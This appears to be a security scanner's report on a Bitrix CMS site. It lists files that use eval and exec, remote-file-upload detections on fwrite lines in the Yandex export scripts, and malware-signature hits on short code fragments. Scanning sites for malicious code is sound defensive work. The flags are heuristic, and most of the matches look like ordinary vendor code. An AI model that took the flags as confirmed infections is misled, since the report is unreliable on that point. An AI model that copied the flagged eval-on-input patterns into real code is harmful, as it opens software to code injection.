eval('return '.$strUnpack.';'); } protected static function __ConvertOldConditions($strAction, &$arFields) { $strAction ToUpper($strAction); if (!is_set($arFields'CONDITIONS')) { $arConditions = array( 'CLASS_ID' => 'CondGroup''DATA' => array( 'All' => 'AND''True' => 'True', ), 'CHILDREN' => array(), ); $intEntityCount 0$arIBlockList self::__ConvertOldOneEntity($arFields'IBLOCK_IDS'); if (!empty($arIBlockList)) { $intEntityCount++; } $arSectionList self::__ConvertOldOneEntity($...

/home/web/web/vsavto.com/public_html/bitrix/modules/catalog/tools/iblock_subelement_generator.php

Size: 30.64 kB Created: 2022-12-02 17:30:19 Modified: 2025-02-03 05:36:41 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(arFileProperties),
            
id 0;
        if(
BX('ib_seg_max_property_id'))
        {
            
id BX('ib_seg_max_property_id').value;
            if(
id >= obPropertyTable.AR_FILE_PROPERTIES.length 2)
            {
                return;
            }
            
BX('ib_seg_max_property_id').value Number(BX('ib_seg_max_property_id').value) + 1;
        }
        
obPropertyTable.SELECTED_PROPERTIES[id] = 'DETAIL';

        var 
propertySpan BX('ib_seg_property_span');
        if(
propertySpan)
        {
            var 
options = [];
            for(var 
key in fileProperties)
            {
                if(
fileProperties....

/home/web/web/vsavto.com/public_html/bitrix/modules/catalog/load/yandex_simple_run.php

Size: 12.03 kB Created: 2022-12-02 17:30:22 Modified: 2025-02-03 05:36:41 Dangers: 4
DescriptionMatch

Exploit download_remote_code2 Line: 90 Dangerous

RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine

fwrite($fp'<?if (!isset($_GET["referer1"])

Exploit download_remote_code2 Line: 97 Dangerous

RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine

fwrite($fp'<? $strReferer1 = htmlspecialchars($_GET["referer1"])

Exploit download_remote_code2 Line: 98 Dangerous

RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine

fwrite($fp'<?if (!isset($_GET["referer2"])

Exploit download_remote_code2 Line: 99 Dangerous

RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine

fwrite($fp'<? $strReferer2 = htmlspecialchars($_GET["referer2"])

/home/web/web/vsavto.com/public_html/bitrix/modules/catalog/load/yandex_run.php

Size: 58.35 kB Created: 2022-12-02 17:30:22 Modified: 2025-02-03 05:36:41 Dangers: 4
DescriptionMatch

Exploit download_remote_code2 Line: 1011 Dangerous

RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine

fwrite($fp'if (!isset($_GET["referer1"])

Exploit download_remote_code2 Line: 1012 Dangerous

RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine

fwrite($fp'$strReferer1 = htmlspecialchars($_GET["referer1"])

Exploit download_remote_code2 Line: 1013 Dangerous

RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine

fwrite($fp'if (!isset($_GET["referer2"])

Exploit download_remote_code2 Line: 1014 Dangerous

RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine

fwrite($fp'$strReferer2 = htmlspecialchars($_GET["referer2"])

/home/web/web/vsavto.com/public_html/bitrix/modules/catalog/options.php

Size: 90.32 kB Created: 2022-12-02 17:30:23 Modified: 2025-02-03 05:36:41 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval( '('+result+')' );
            var 
el BX(res);
            
BX(res).setAttribute('class''adm-btn');
            if (
el.bxwaiter && el.bxwaiter.parentNode)
            {
                
el.bxwaiter.parentNode.removeChild(el.bxwaiter);
                
el.bxwaiter null;
            }
            
el.disabled false;
        }
    }
</
script>
<? } 
$systemTabControl = new CAdminTabControl("tabControl2"$aTabstruetrue); $systemTabControl->Begin(); ?>

<?php
if ($canUseYandexMarket) { $systemTabControl->BeginNextTab(); ?>
    <tr><td style="text-align: left;"><? $arAgentInfo ...

/home/web/web/vsavto.com/public_html/bitrix/modules/catalog/admin/cat_store_document_edit.php

Size: 63.33 kB Created: 2022-12-02 17:30:23 Modified: 2025-02-03 05:36:41 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval( '('+result+')' );
            if (
res['id'] > 0)
            {
                
res['quantity'] = 1;
                
let obProductAdd BX('productAdd');
                if (
BX.type.isElementNode(obProductAdd))
                {
                    
obProductAdd.disabled true;
                }
                
addRow([res]);
            }
        }
    }

    function 
enterBarcodes(id)
    {
        var 
amount;
        if(
BX('CAT_DOC_AMOUNT_HIDDEN_'+id))
            
amount parseInt(BX('CAT_DOC_AMOUNT_HIDDEN_'+id).value10);
        else
            
amount 0;
        if(
isNaN(amount))
            
amount 0;
        
maxId amount;

        var
            
content BX.create('DIV',...

/home/web/web/vsavto.com/public_html/bitrix/modules/catalog/admin/export_setup.php

Size: 63.57 kB Created: 2022-12-02 17:30:23 Modified: 2025-02-03 05:36:41 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec("crontab ".$_SERVER["DOCUMENT_ROOT"]."/bitrix/crontab/crontab.cfg"$arRetval$return_var); if (intval($return_var)!=0) { $strErrorMessage .= GetMessage("CES_ERROR_ADD2CRON")." \n"; if (is_array($arRetval) && !empty($arRetval)) { $strErrorMessage .= implode("\n"$arRetval)."\n"; } else { $strErrorMessage .= GetMessage("CES_ERROR_UNKNOWN")."\n"; } } } } } if ($strErrorMessage == '') { $redirectUrl "/bitrix/admin/cat_export_setup.php?lang=".urlencode(LANGUAGE_ID)."&success_export=Y"$adm...

/home/web/web/vsavto.com/public_html/bitrix/modules/catalog/admin/import_setup.php

Size: 60.99 kB Created: 2022-12-02 17:30:23 Modified: 2025-02-03 05:36:41 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec("crontab ".$_SERVER["DOCUMENT_ROOT"]."/bitrix/crontab/crontab.cfg"$arRetval$return_var); if (intval($return_var)!=0) { $strErrorMessage .= GetMessage("CES_ERROR_ADD2CRON")." \n"; if (is_array($arRetval) && !empty($arRetval)) { $strErrorMessage .= implode("\n"$arRetval)."\n"; } else { $strErrorMessage .= GetMessage("CES_ERROR_UNKNOWN")."\n"; } } } } } if ($strErrorMessage == '') { $redirectUrl "/bitrix/admin/cat_import_setup.php?lang=".urlencode(LANGUAGE_ID)."&success_import=Y"$adm...

/home/web/web/vsavto.com/public_html/bitrix/modules/catalog/admin/cat_product_search.php

Size: 9.61 kB Created: 2022-12-02 17:30:23 Modified: 2025-02-03 05:36:41 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("window.opener.document.<?= $form_name ?>.<?= $field_name ?>");
        if(
el)
            
el.value id;
        <?if (
$field_name_name <> ''):?>
            el = eval("window.opener.document.<?= $form_name ?>.<?= $field_name_name ?>");
            if(el)
                el.value = name;
        <?endif;?>
        <?if ($field_name_url <> ''):?>
            el = eval("window.opener.document.<?= $form_name ?>.<?= $field_name_url ?>");
            if(el)
                el.value = url;
        <?endif;?>
        <?if ($alt_name <> ''):?>
            el = window.opener.document.getElementById("<?= $alt_n...

/home/web/web/vsavto.com/public_html/bitrix/modules/xzag.telegram/vendor/twig/twig/src/Test/IntegrationTestCase.php

Size: 8.25 kB Created: 2022-12-02 17:30:23 Modified: 2025-02-03 05:36:41 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval('$ret = '.$condition.';'); if (!$ret) { $this->markTestSkipped($condition); } } $loader = new ArrayLoader($templates); foreach ($outputs as $i => $match) { $config array_merge([ 'cache' => false'strict_variables' => true, ], $match[2] ? eval($match[2].';') : []); $twig = new Environment($loader$config); $twig->addGlobal('global''global'); foreach ($this->getRuntimeLoaders() as $runtimeLoader) { $twig->addRuntimeLoader($runtimeLoader); } foreach ($this->getExtensions() as $extension)...

/home/web/web/vsavto.com/public_html/bitrix/modules/xzag.telegram/vendor/twig/twig/src/Environment.php

Size: 51.72 kB Created: 2022-12-02 17:30:24 Modified: 2025-02-03 05:36:41 Warns: 1 Dangers: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval('?>'.$content); } } if (!class_exists($clsfalse)) { throw new RuntimeError(sprintf('Failed to load Twig template "%s", index "%s": cache might be corrupted.'$name$index), -1$source); } } if (!$this->runtimeInitialized) { $this->initRuntime(); } return $this->loadedTemplates[$cls] = new $cls($this); } public function createTemplate($template$name null) { $hash hash('sha256'$templatefalse); if (null !== $name) { $name sprintf('%s (string template %s)'$name$hash); } els...

Sign 11413268 Line: 497 Dangerous

Malware Signature (hash: 11413268)

eval('?>

/home/web/web/vsavto.com/public_html/bitrix/modules/xzag.telegram/vendor/twig/twig/tests/ErrorTest.php

Size: 7.64 kB Created: 2022-12-02 17:30:25 Modified: 2025-02-03 05:36:41 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec(sprintf('%s %s debug', \PHP_BINARYescapeshellarg(__DIR__.'/Fixtures/errors/leak-output.php'))); $this->assertSame('Hello OOPS'$output); } public function testDoesNotTwigLeakOutput() { $output exec(sprintf('%s %s', \PHP_BINARYescapeshellarg(__DIR__.'/Fixtures/errors/leak-output.php'))); $this->assertSame(''$output); } } class ErrorTest_Foo { public function bar() { throw new \Exception('Runtime error...')

/home/web/web/vsavto.com/public_html/bitrix/modules/xzag.telegram/vendor/twig/twig/tests/EnvironmentTest.php

Size: 21.76 kB Created: 2022-12-02 17:30:25 Modified: 2025-02-03 05:36:41 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(<<<EOF
use Twig\Extension\AbstractExtension;

class EnvironmentTest_ExtensionInEval extends AbstractExtension
{
}
EOF
); 
$extension = new \EnvironmentTest_ExtensionInEval(); $loader = new ArrayLoader(['page' => 'hey']); $twig = new Environment($loader); $twig->addExtension($extension); $this->assertInstanceOf('\Twig\Extension\ExtensionInterface'$twig->getExtension(\get_class($extension))); $this->assertTrue($twig->isTemplateFresh('page'time())); } public function testInitRuntimeWithAnEx...

/home/web/web/vsavto.com/public_html/bitrix/modules/landing/install/components/bitrix/landing.start/lang/en/component.php

Size: 5.85 kB Created: 2022-12-02 17:30:34 Modified: 2025-02-03 05:36:42 Dangers: 1
DescriptionMatch

Sign 301ca578 Line: 36 Dangerous

Malware Signature (hash: 301ca578)

Trojan

/home/web/web/vsavto.com/public_html/bitrix/modules/landing/lib/block.php

Size: 120.04 kB Created: 2022-12-02 17:30:38 Modified: 2025-02-03 05:36:42 Warns: 1 Dangers: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval('?>' $content '<?'); } catch (\ParseError $e) { $errMessage $this::getMessageBlock([ 'MESSAGE' => Loc::getMessage('LANDING_BLOCK_MESSAGE_ERROR_EVAL') ]); if ($params['wrapper_show']) { echo '<div id="' $anchor '" class="block-wrapper' . (!$this->active ' landing-block-deactive' '') . '">' $errMessage '</div>'; } else { echo $errMessage; } } } } elseif ($this->active || $params['force_unactive']) { static $sysPagesSites = []; if (!array_key_exists($this->siteId$sysPagesSi...

Sign 11413268 Line: 2858 Dangerous

Malware Signature (hash: 11413268)

eval('?>

/home/web/web/vsavto.com/public_html/bitrix/modules/landing/lib/mutator.php

Size: 20.29 kB Created: 2022-12-02 17:30:38 Modified: 2025-02-03 05:36:42 Dangers: 2
DescriptionMatch

Sign 99fc3b9d Line: 1 Dangerous

Malware Signature (hash: 99fc3b9d)

$GLOBALS['____

Sign ae7830db Line: 1 Dangerous

Malware Signature (hash: ae7830db)

yZXBsYWNl

/home/web/web/vsavto.com/public_html/bitrix/modules/landing/lib/hook/page.php

Size: 4.53 kB Created: 2022-12-02 17:30:38 Modified: 2025-02-03 05:36:42 Warns: 1
DescriptionMatch

Function exec Line: 287 Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec()

/home/web/web/vsavto.com/public_html/bitrix/modules/landing/lib/hook/page/layout.php

Size: 1.53 kB Created: 2022-12-02 17:30:38 Modified: 2025-02-03 05:36:42 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec(): void { if ($this->execCustom()) { return; } $breakpoint trim(HtmlFilter::encode($this->fields['BREAKPOINT'])); if(!$breakpoint) { $breakpoint self::DEFAULT_BREAKPOINT; } Manager::setPageView('MainClass''landing-layout-breakpoint--' $breakpoint)

/home/web/web/vsavto.com/public_html/bitrix/modules/landing/lib/hook/page/gacounter.php

Size: 3.60 kB Created: 2022-12-02 17:30:38 Modified: 2025-02-03 05:36:42 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec() { if ($this->execCustom()) { return; } if ($this->fields['USE']->getValue() != 'Y') { return; } $this->setCounter($this->fields['COUNTER']); $sendData = []; if ($this->fields['SEND_CLICK']->getValue() == 'Y') { $sendData[] = 'click'; } if ($this->fields['SEND_SHOW']->getValue() == 'Y') { $sendData[] = 'show'; } if (!empty($sendData)) { \Bitrix\Landing\Manager::setPageView'BodyTag'' data-event-tracker=\'' json_encode($sendData) . '\'' ); $clickType $this->fields['CLICK_TYPE']->getV...

/home/web/web/vsavto.com/public_html/bitrix/modules/landing/lib/hook/page/yacounter.php

Size: 2.70 kB Created: 2022-12-02 17:30:38 Modified: 2025-02-03 05:36:42 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec() { if ($this->execCustom()) { return; } if ($this->fields['USE']->getValue() != 'Y') { return; } $this->setCounter($this->fields['COUNTER']); } public static function setCounter(string $counter): void $counter = \htmlspecialcharsbx(trim($counter)); $counter = \CUtil::jsEscape($counter); if (!$counter) { return; } Cookies::addCookieScript'ym''(function(m,e,t,r,i,k,a){m[i]=m[i]||function(){(m[i].a=m[i].a||[]).push(arguments)};
            m[i].l=1*new Date();k=e.createElement(t),a=e.getElements...

/home/web/web/vsavto.com/public_html/bitrix/modules/landing/lib/hook/page/fonts.php

Size: 5.81 kB Created: 2022-12-02 17:30:38 Modified: 2025-02-03 05:36:42 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec() { if (!self::$setFonts) { return; } $this->fields['CODE'] = str_replace( ['st yle''onl oad''li nk'], ['style''onload''link'], $this->fields['CODE'] ); $styleFound preg_match_all'#(<noscript>.*?<style.*?data-id="([^"]+)"[^>]*>[^<]+</style>)#is'$this->fields['CODE'], $matches ); $fonts = []; if ($styleFound) { $fonts array_combine($matches[2], $matches[1]); } $this->outputFonts($fonts); } protected function outputFonts(array $fonts): void $setFonts = []; foreach (self::$se...

/home/web/web/vsavto.com/public_html/bitrix/modules/landing/lib/hook/page/robots.php

Size: 1.17 kB Created: 2022-12-02 17:30:38 Modified: 2025-02-03 05:36:42 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec() { return $this->fields['CONTENT']->getValue()

/home/web/web/vsavto.com/public_html/bitrix/modules/landing/lib/hook/page/pixelfb.php

Size: 4.01 kB Created: 2022-12-02 17:30:38 Modified: 2025-02-03 05:36:42 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec() { if ($this->execCustom()) { return; } $zone ''; if (Loader::includeModule('bitrix24')) { $zone = \CBitrix24::getPortalZone(); } elseif (file_exists($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/lang/ru") && !file_exists($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/lang/ua")) { $zone 'ru'; } if ($zone === 'ru') { return; } $counter null$businessPixel $this->getBusinessPixel(); if ($this->fields['USE']->getValue() === 'Y') { $counter = \htmlspecialcharsbx(trim($this->fields[...

/home/web/web/vsavto.com/public_html/bitrix/modules/landing/lib/hook/page/cookies.php

Size: 5.15 kB Created: 2022-12-02 17:30:38 Modified: 2025-02-03 05:36:42 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec(): void { if ($this->execCustom()) { return; } if ($this->fields['USE']->getValue() == 'Y') { $infoMode $this->isInformationMode(); if (!$infoMode) { self::$enabled trueManager::clearPageView('Noscript'); } ob_start(); Manager::getApplication()->includeComponent'bitrix:landing.cookies''', [ 'USE' => $this->fields['USE']->getValue(), 'POSITION' => $this->fields['POSITION']->getValue(), 'COLOR_BG' => $this->fields['COLOR_BG']->getValue(), 'COLOR_TEXT' => $this->fields['COLOR_TEXT']-...

/home/web/web/vsavto.com/public_html/bitrix/modules/landing/lib/hook/page/metamain.php

Size: 2.49 kB Created: 2022-12-02 17:30:38 Modified: 2025-02-03 05:36:42 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec() { if ($this->execCustom()) { return; } $title = \htmlspecialcharsbx(Seo::processValue('title'$this->fields['TITLE'])); $description Seo::processValue('description'$this->fields['DESCRIPTION']); $keywords Seo::processValue('keywords'$this->fields['KEYWORDS']); if ($title != '') { Manager::setPageTitle($title); } if ($description != '') { Manager::getApplication()->setPageProperty'description'$description ); } if ($keywords != '') { Manager::getApplication()->setPageProperty( ...

/home/web/web/vsavto.com/public_html/bitrix/modules/landing/lib/hook/page/favicon.php

Size: 2.54 kB Created: 2022-12-02 17:30:38 Modified: 2025-02-03 05:36:42 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec() { if ($this->execCustom()) { return; } $picture intval($this->fields['PICTURE']->getValue()); if ($picture 0) { $icons ''$sizes = array('16x16''32x32''96x96'); foreach ($sizes as $size) { list($w$h) = explode('x'$size); $file = \CFile::resizeImageGet( \Bitrix\Landing\File::getFileArray($picture), array( 'width' => $w'height' => $h ), BX_RESIZE_IMAGE_EXACT ); $srcExplode explode('.'$file['src']); $ext array_pop($srcExplode); $icons .= '<link rel="icon" type="image/'...

/home/web/web/vsavto.com/public_html/bitrix/modules/landing/lib/hook/page/b24button.php

Size: 6.33 kB Created: 2022-12-02 17:30:38 Modified: 2025-02-03 05:36:42 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec() { if ($this->execCustom()) { return; } $code = \htmlspecialcharsbx(trim($this->fields['CODE'])); if ($code != 'N') { Landing\Manager::setPageView'BeforeBodyClose''<script data-skip-moving="true">
                    (function(w,d,u,b){ \'use strict\';
                    var s=d.createElement(\'script\');var r=(Date.now()/1000|0);s.async=1;s.src=u+\'?\'+r;
                    var h=d.getElementsByTagName(\'script\')[0];h.parentNode.insertBefore(s,h);
                })(window,document,\'' 
$code '\');
                </script>' 
); if ($this->fields[...

/home/web/web/vsavto.com/public_html/bitrix/modules/landing/lib/hook/page/ymap.php

Size: 2.01 kB Created: 2022-12-02 17:30:38 Modified: 2025-02-03 05:36:42 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec() { if ($this->execCustom()) { return; } if (!Manager::availableOnlyForZone('ru')) { return; } $code HtmlFilter::encode(trim($this->fields['CODE'])); $assets Asset::getInstance(); $assets->addString"<script defer>
                (function(){
                    'use strict';
                    //fake function, if API will loaded fasten than blocks
                    window.onYandexMapApiLoaded = function(){}
                })();
            </script>" 
); $assets->addString'<script src="https://api-maps.yandex.ru/2.1/?apikey=' $code '&lang=ru_RU&onload...

/home/web/web/vsavto.com/public_html/bitrix/modules/landing/lib/hook/page/copyright.php

Size: 1.12 kB Created: 2022-12-02 17:30:38 Modified: 2025-02-03 05:36:42 Warns: 1
DescriptionMatch

Function exec Line: 65 Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec()

/home/web/web/vsavto.com/public_html/bitrix/modules/landing/lib/hook/page/metayandexverification.php

Size: 1.51 kB Created: 2022-12-02 17:30:38 Modified: 2025-02-03 05:36:42 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec() { if ($this->execCustom()) { return; } $meta trim($this->fields['META']); if (preg_match('#^<meta\s+name="yandex-verification"\s+content="[a-z0-9_\-]+"\s+/*>$#i'$meta)) { Manager::setPageView('BeforeHeadClose'$meta)

/home/web/web/vsavto.com/public_html/bitrix/modules/landing/lib/hook/page/gmap.php

Size: 1.71 kB Created: 2022-12-02 17:30:38 Modified: 2025-02-03 05:36:42 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec() { if ($this->execCustom()) { return; } $code HtmlFilter::encode(trim($this->fields['CODE'])); $assets Asset::getInstance(); $assets->addString"<script defer>
                (function(){
                    'use strict';
                    //fake function, if API will loaded fasten than blocks
                    window.onGoogleMapApiLoaded = function(){}
                })();
            </script>" 
); $assets->addString'<script defer src="https://maps.googleapis.com/maps/api/js?key=' $code '&callback=onGoogleMapApiLoaded"></script>' )

/home/web/web/vsavto.com/public_html/bitrix/modules/landing/lib/hook/page/up.php

Size: 855.00 B Created: 2022-12-02 17:30:38 Modified: 2025-02-03 05:36:42 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec() { if ($this->execCustom()) { return; } $assets Assets\Manager::getInstance(); $assets->addAsset('landing_upper')

/home/web/web/vsavto.com/public_html/bitrix/modules/landing/lib/hook/page/metaog.php

Size: 4.23 kB Created: 2022-12-02 17:30:38 Modified: 2025-02-03 05:36:42 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec() { if ($this->execCustom()) { return; } $output ''$files = []; $tags = [ 'title' => \htmlspecialcharsbx(Seo::processValue('title'$this->fields['TITLE'])), 'description' => \htmlspecialcharsbx(Seo::processValue('description'$this->fields['DESCRIPTION'])), 'image' => trim($this->fields['IMAGE']), 'type' => 'website' ]; foreach (['og''twitter'] as $rootTag) { foreach ($tags as $key => $val) { if ($key == 'image' && intval($val) > 0) { $val intval($val); if (!array_key_exists($val,...

/home/web/web/vsavto.com/public_html/bitrix/modules/landing/lib/hook/page/view.php

Size: 2.18 kB Created: 2022-12-02 17:30:38 Modified: 2025-02-03 05:36:42 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec(): void { if ($this->execCustom()) { return; } $type trim($this->fields['TYPE']); $bodyClass ''$mainClasses ''; if ($type === 'ltr') { $bodyClass 'landing-viewtype--ltr'$mainClasses 'g-pt-6 g-px-10 g-pt-30--md g-px-50--md'; } elseif ($type === 'all') { $bodyClass 'landing-viewtype--all'$mainClasses 'g-py-6 g-px-10 g-py-30--md g-px-50--md'; } elseif ($type === 'mobile') { $bodyClass 'landing-viewtype--mobile'$mainClasses 'mx-auto'; } elseif ($type === 'adaptive') { ...

/home/web/web/vsavto.com/public_html/bitrix/modules/landing/lib/hook/page/speed.php

Size: 2.67 kB Created: 2022-12-02 17:30:38 Modified: 2025-02-03 05:36:42 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec(): void { if (Landing::getEditMode()) { $this->disableWebpack(); } else { $this->execWebpack(); $this->execLazyLoad(); } } protected function disableWebpack(): void $assets Assets\Manager::getInstance(); $assets->setStandartMode(); } protected function execWebpack(): void $assets Assets\Manager::getInstance(); if ($this->fields['USE_WEBPACK']->getValue() !== 'N') { $assets->setWebpackMode(); } else { $assets->setStandartMode(); } } protected function execLazyLoad(): void { if ($this...

/home/web/web/vsavto.com/public_html/bitrix/modules/landing/lib/hook/page/pixelvk.php

Size: 1.89 kB Created: 2022-12-02 17:30:38 Modified: 2025-02-03 05:36:42 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec() { if ($this->execCustom()) { return; } $counter = \htmlspecialcharsbx(trim($this->fields['COUNTER'])); $counter = \CUtil::jsEscape($counter); if ($counter) { Cookies::addCookieScript'vkp''!function(){
                    var t=document.createElement("script");
                    t.type="text/javascript",
                    t.async=!0,
                    t.src="https://vk.com/js/api/openapi.js?160",
                    t.onload=function(){VK.Retargeting.Init("' 
$counter '"),
                    VK.Retargeting.Hit()},document.head.appendChild(t)
                }();' 
); Manager::...

/home/web/web/vsavto.com/public_html/bitrix/modules/landing/lib/hook/page/themefonts.php

Size: 11.46 kB Created: 2022-12-02 17:30:38 Modified: 2025-02-03 05:36:42 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec(): void { if ($this->execCustom()) { return; } $this->setThemeFont(); $this->setHFontTheme(); $this->setSize(); $this->setColors(); $this->setTypo(); } protected function getField(string $name): ?string { if ($field $this->fields[$name]->getValue()) { return HtmlFilter::encode(trim($field)); } return self::getDefaultValues()[$name]; } protected static function getDefaultValues(): array { return [ 'CODE' => 'Open Sans''CODE_H' => 'Open Sans''SIZE' => '1''LINE_HEIGHT' => '1.6''FONT_...

/home/web/web/vsavto.com/public_html/bitrix/modules/landing/lib/hook/page/background.php

Size: 4.48 kB Created: 2022-12-02 17:30:38 Modified: 2025-02-03 05:36:42 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec() { if ($this->execCustom()) { return; } $picture = \htmlspecialcharsbx(trim($this->fields['PICTURE']->getValue())); $color = \htmlspecialcharsbx(trim($this->fields['COLOR']->getValue())); $position trim($this->fields['POSITION']->getValue()); $this->setBackground($picture$color$position); } public static function setBackground(?string $picture, ?string $color null, ?string $position null): void { if ($picture && is_numeric($picture) && (int)$picture 0) { $picture = \htmlspecial...

/home/web/web/vsavto.com/public_html/bitrix/modules/landing/lib/hook/page/cssblock.php

Size: 1.73 kB Created: 2022-12-02 17:30:38 Modified: 2025-02-03 05:36:42 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec() { if ($this->execCustom()) { return; } $cssCode trim($this->fields['CODE']); $cssFile trim($this->fields['FILE']); if ($cssCode != '') { echo '<style type="text/css">' $cssCode '</style>'; } if ($cssFile != '') { echo '<link href="' . \htmlspecialcharsbx($cssFile)

/home/web/web/vsavto.com/public_html/bitrix/modules/landing/lib/hook/page/settings.php

Size: 8.51 kB Created: 2022-12-02 17:30:38 Modified: 2025-02-03 05:36:42 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec() { } public static function getDataForSite($id null) { static $settings = array(); if (isset($settings[$id])) { return $settings[$id]; } $settings[$id] = array(); if ($id) { $hooks Hook::getData$idHook::ENTITY_TYPE_SITE ); } foreach (self::getDefaultValues() as $key => $defValue) { if (isset($hooks['SETTINGS'][$key])) { $settings[$id][$key] = $hooks['SETTINGS'][$key]; } else { $settings[$id][$key] = $defValue; } } if (!Manager::isB24()) { $settings[$id]['IBLOCK_ID'] = isset($hooks[...

/home/web/web/vsavto.com/public_html/bitrix/modules/landing/lib/hook/page/gtm.php

Size: 2.33 kB Created: 2022-12-02 17:30:38 Modified: 2025-02-03 05:36:42 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec() { if ($this->execCustom()) { return; } $counter = \htmlspecialcharsbx(trim($this->fields['COUNTER'])); $counter = \CUtil::jsEscape($counter); if ($counter) { Cookies::addCookieScript'gtm''(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({\'gtm.start\':new Date().getTime(),event:\'gtm.js\'});
                var f=d.getElementsByTagName(s)[0],
                j=d.createElement(s),
                dl=l!=\'dataLayer\'?\'&l=\'+l:\'\';
                j.async=true;
                j.src=\'https://www.googletagmanager.com/gtm.js?id=\'+i+dl;
                f.parent...

/home/web/web/vsavto.com/public_html/bitrix/modules/landing/lib/hook/page/metarobots.php

Size: 1.16 kB Created: 2022-12-02 17:30:38 Modified: 2025-02-03 05:36:42 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec() { if ($this->execCustom()) { return; } if (\Bitrix\Landing\Landing::getPreviewMode()) { $use 'N'; } else { $use $this->fields['INDEX']->getValue(); } \Bitrix\Main\Page\Asset::getInstance()->addString'<meta name="robots" content="' . ($use != 'N' 'all' 'noindex') . '" />' )

/home/web/web/vsavto.com/public_html/bitrix/modules/landing/lib/hook/page/metagoogleverification.php

Size: 1.47 kB Created: 2022-12-02 17:30:38 Modified: 2025-02-03 05:36:42 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec() { if ($this->execCustom()) { return; } $meta trim($this->fields['META']); if (preg_match('#^<meta\s+name="google-site-verification"\s+content="[a-z0-9_\-]+"\s+/*>$#i'$meta)) { Manager::setPageView('BeforeHeadClose'$meta)

/home/web/web/vsavto.com/public_html/bitrix/modules/landing/lib/hook/page/headblock.php

Size: 2.99 kB Created: 2022-12-02 17:30:38 Modified: 2025-02-03 05:36:42 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec() { if ($this->isLocked()) { return; } if ($this->execCustom()) { return; } $code trim($this->fields['CODE']); if ($code != '') { self::$lastInsertedCode $code$code str_replace'<script''<script data-skip-moving="true"'$code ); \Bitrix\Main\Page\Asset::getInstance()->addString($code)

/home/web/web/vsavto.com/public_html/bitrix/modules/landing/lib/hook/page/theme.php

Size: 11.36 kB Created: 2022-12-02 17:30:38 Modified: 2025-02-03 05:36:42 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

